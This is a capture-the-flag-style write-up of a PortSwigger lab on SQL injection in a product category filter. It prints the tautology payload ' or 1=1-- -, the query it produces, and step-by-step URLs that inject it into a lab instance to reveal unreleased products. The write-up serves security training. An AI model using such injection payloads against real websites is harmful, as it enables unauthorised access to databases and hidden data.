# Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

## [Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)

**This lab contains an** [**SQL injection**](https://portswigger.net/web-security/sql-injection) **vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:**

```sql
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
```

**To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.**

### Solution: 

```sql
' or 1=1-- -
```

```sql
SELECT * FROM products WHERE category = '' or 1=1-- -' AND released = 1
```

### **Steps:**

1. **Visit:**[**https://YOUR-SESSION.web-security-academy.net/filter?category=Accessories**](https://your-session.web-security-academy.net/filter?category=Accessories)
2. **Insert single quote \[ ' ] :**[**https://YOUR-SESSION.web-security-academy.net/filter?category=Accessories**](https://your-session.web-security-academy.net/filter?category=Accessories)**'**
3. **You will gain an internal server error**
4. **Try to inject tautology payload to retrieve released and unreleased products**
5. <https://ac631f881eeeb165c0bf17e90011009b.web-security-academy.net/filter?category=Accessories>' or 1=1-- -
6.

```
<figure><img src="https://3344169606-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjoHbOFRbwrmbD6PvIUkf%2Fuploads%2FdsrwRZWApHmQMDzTjkHP%2Fimage.png?alt=media&#x26;token=79d37cac-7d52-498b-a251-af92012c8fe4" alt=""><figcaption></figcaption></figure>
```

7.

```
<figure><img src="https://3344169606-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjoHbOFRbwrmbD6PvIUkf%2Fuploads%2FjmedbBnWQyqGsBggTv7g%2Fimage.png?alt=media&#x26;token=0ff652c4-399d-4307-9956-344d477db6e9" alt=""><figcaption></figcaption></figure>
```